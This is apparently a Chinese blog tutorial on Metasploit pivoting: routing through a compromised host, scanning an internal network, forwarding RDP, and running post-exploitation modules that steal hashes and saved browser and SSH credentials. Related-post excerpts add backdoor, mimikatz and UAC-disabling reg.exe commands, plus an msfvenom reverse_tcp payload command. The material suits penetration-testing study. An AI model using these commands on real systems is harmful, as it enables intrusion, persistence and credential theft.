msf客户端渗透(七):跳板

跳板

假设有这样一个场景,有一个局域网内网网关是1.1.1.1,局域网里的主机1是kali,它经过一个防火墙连接到公网,主机2和主机3在另一个内网网关为2.1.1.1的局域网,由于防火墙做了设置,只有主机2可以通过防火墙连接到公网,主机3无法通过防火墙连接到公网,但是主机2和主机3是互联的。两个局域网可以通过公网的路由相互连接。

防火墙1设置了端口映射规则,将防火墙的4444端口映射到主机1的4444端口,当主机1侦听本机的4444端口时相当于侦听防火墙的4444端口

主机1已经获得了主机2的session,但是由于防火墙2的设置,主机3的出外网的流量被阻挡,所以主机1无法直接控制主机3,所以我们需要利用已经得到session的主机2作为跳板对主机3进行控制。

使用路由的方法,建立跳板

我们已经获得了主机2的shell,需要关掉主机的UAC和防火墙,利用主机2建立一个路由,建立路由的方法很简单

建立好路由之后,扫描内网

设置目标IP地址范围

设置扫描的端口

run开始扫描

利用跳板攻击内网主机

设置内网目标IP

设置payload

设置反弹IP为作为跳板的主机IP

exploit获取到主机3的session

sessions查看可以看出有两个session,分别是主机2和主机3的

因为主机2已经作为一个路由所以主机3可以经过主机2到达主机1,可以直接将反弹IP设置为主机1的IP

又获得了一个session,这个session是由2.1.1.11:1041和192.168.21.91:4444直接连接起来的

三个session对应在主机3上黄框中的端口连接

利用已经被控的计算机,在kali与被攻击主机之间实现端口转发

将2.1.1.11的3389端口映射到1.1.1.10的3389端口,当访问1.1.1.10的3389端口时就相当于访问2.1.1.11的3389端口

在主机1上再开一个终端

打开远程桌面,目标是本机IP,相当打开的是主机3的远程桌面

post模块

获取session前加上这个设置,只需一次exploit,持续有效,不用每次获取session时都要exploit

获取一个session ,并进入shell

arp扫描模块

查看是否是一个虚拟机

获取用户和hash值

查看安装的应用程序

获取当前登录的账号

获取snmp的信息

扫描可能可以进行本地提权的漏洞

获取操作系统信息

获取目标系统上的firefox保存的用户密码信息

获取目标系统保存的ssh信息

设置自动运行脚本模块

运行的时候加-j -z 启用脚本侦听

当侦听到session时自动运行脚本

时间: 2024-11-03 01:06:34

msf客户端渗透(七):跳板的相关文章

msf客户端渗透(六):抓包

50000个包满了就会自己销毁掉从0个包开始抓 run 搜索文件 破解弱口令 使用system权限的session 结果保存在/tmp里 run执行 MAC时间 windows上按时间来搜文件,可以查看某个时间段对文件系统的操作 修改linux文件时间 当去查看这个文件时,访问时间就会发生变化 对文件修改时,文件的修改时间也发生了变化 msf修改时间

msf客户端渗透(二)

这个漏洞利用只在XP上有效 构造pdf exploit生成一个pdf文件 传到被攻击机上 启动msf侦听 exploit -j XP上双击运行这个pdf时,kali获取到一个shell

msf客户端渗透(三)

提权,但是失败了,这是由于win7系统上UAC的限制

msf客户端渗透(八):持久后门,mimikatz使用,获取PHP服务器shell

持续后门 先获取一个session 在目标主机上生成持续后门 设置侦听参数 启动侦听 重新启动被攻击的主机 一启动攻击者时获取到session mimikatz的使用 mimikatz是俄罗斯组织开发的工具 加载mimikatz help查看命令 msv获取用户名和hash wdigest获取内存中的明文密码信息 kerberos获取内存中的明文密码信息 查看hash 查看bootkey 查看被攻击主机上运行的进程 查看被攻击主机上运行的服务 查看被攻击主机的加密条件 PHP shell 生成一

msf客户端渗透(四):hashdump

如果你获得一个system权限的session 进入到这个session 进入到shell 依次输入以下命令 cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Mi

msf客户端渗透(五):注册表

先获取到一个session 上传nc到被攻击主机上 建立一个键值 创建一个策略 kali上查看是否成功创建键值 后台开启cmd 查看防火墙的策略 打开防火墙的端口 添加一条防火墙策略 在win7上查看防火墙策略 win7重启之后防火墙的端口就打开了,而且开启了nc向kali发起连接 kali 侦听444端口就可以建立连接

Android新浪微博客户端(七)——ListView中的图片异步加载、缓存

原文出自:方杰|http://fangjie.sinaapp.com/?p=193转载请注明出处 最终效果演示:http://fangjie.sinaapp.com/?page_id=54该项目代码已经放到github:https://github.com/JayFang1993/SinaWeibo 一.ListView的图片异步加载 我们都知道对每一个Weibo Item都有用户头像,而且每一条微博还可能带有图片.如果在加载列表的同时加载图片,这样有几个缺点,第一很费事,界面卡住,用户体验很不

《metasploit渗透测试魔鬼训练营》学习笔记第六章--客户端渗透

四.客户端攻击 客户端攻击与服务端攻击有个显著不同的标识,就是攻击者向用户主机发送的恶意数据不会直接导致用户系统中的服务进程溢出,而是需要结合一些社会工程学技巧,诱使客户端用户去访问这些恶意数据,间接发生攻击. 4.1客户端渗透攻击的安全防护机制 ①DEP DEP(数据执行保护)基本原理是操作系统通过设置内存页的属性,指明数据所在的内存页为不可执行. ②ASLR ASLR(地址空间布局随机化)是系统在运行程序时,不用固定的基地址加载进程及相关工作库文件. 包括:堆地址的随机化,栈基址的随机化,P

msf后渗透

生成exe后门 p.p1 { margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; color: #000000; background-color: rgba(255, 255, 255, 0.75) } span.s1 { } msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.ex 传到测试机执行后得到反弹sh